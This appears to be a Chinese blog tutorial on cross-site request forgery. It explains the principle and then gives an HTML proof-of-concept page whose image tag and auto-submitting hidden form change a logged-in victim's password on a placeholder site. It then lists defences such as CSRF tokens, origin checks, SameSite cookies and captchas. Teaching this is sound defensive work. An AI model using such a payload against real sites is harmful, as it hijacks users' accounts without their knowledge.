码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • 网络安全:发起一次CSRF攻击!


    一、如何发起一次CSRF攻击

    原理:CSRF 的本质实际上是利用了 Cookie 会自动在请求中携带的特性,通过伪造请求来执行恶意操作。

    1、目标网站信息:

    接口地址:https://victim.com/change-password
    请求类型:get/post
    接受参数:password
    
    • 1
    • 2
    • 3

    2、编写一个网页

    DOCTYPE html>
    <html>
    	<body>
    		
    		<img src="https://victim.com/change-password?password=vme50">
    		
    		 <form action="https://victim.com/change-password" method=POST>
    		    <input type="hidden" name="password" value="vme50" />
    		form>
    		<script> document.forms[0].submit(); script> 
    	body>
    html>
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12

    3、诱导用户打开我们的网页

    用户在已经登录了https://victim.com这个网站的情况下打开我们的网站,代码会自动发起网络请求,将受害者的账号密码修改为我们设置的值

    二、防护策略

    1、使用 CSRF Token(推荐):

    在每个表单提交或敏感操作中包含一个随机生成的 CSRF Token,并将其与用户的会话关联起来。
    服务器在接收到请求时验证 CSRF Token 的有效性,如果不匹配,则拒绝请求。
    这样可以防止攻击者伪造请求,因为攻击者无法获取有效的 CSRF Token。

    2、同源检测:

    ① 验证请求头:在服务器端验证请求头中的 Referer 字段或 Origin 字段,确保请求来自合法的源
    ② 验证域名:在服务器端对请求进行同源检测,只接受来自同一域名下的请求
    ③ 对在本域发起的攻击无效

    3、设置 SameSite Cookie 属性:

    将敏感的 Cookie 设置为 SameSite 属性为 Strict 或 Lax,限制其在跨站点请求中的发送,从而减少 CSRF 攻击的风险。

    4、二次确认

    ① 验证码:对于敏感操作,可以要求用户输入验证码进行验证,以确保请求是由真实用户发起的

  • 相关阅读:
    【C++内存管理侯捷】---学习笔记(上)primitives(new,delete...),std::allocator
    一分钟导入所有快递单号查询的方法
    【系统架构设计】 架构核心知识: 2 云原生架构
    WZOI-264合唱队形
    “益路同行”栏目人物专访 第0010期——中国公益万里行发起人李现
    从autojs到冰狐智能辅助的心里历程
    腾讯云服务器镜像TencentOS Server操作系统详细介绍
    JavaSE - 类和对象
    Flink系列之Flink中RestartStrategy重启策略和FailoverStrategy故障转移策略
    perl从文件中搜索关键字
  • 原文地址:https://blog.csdn.net/weixin_41981909/article/details/133646525
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号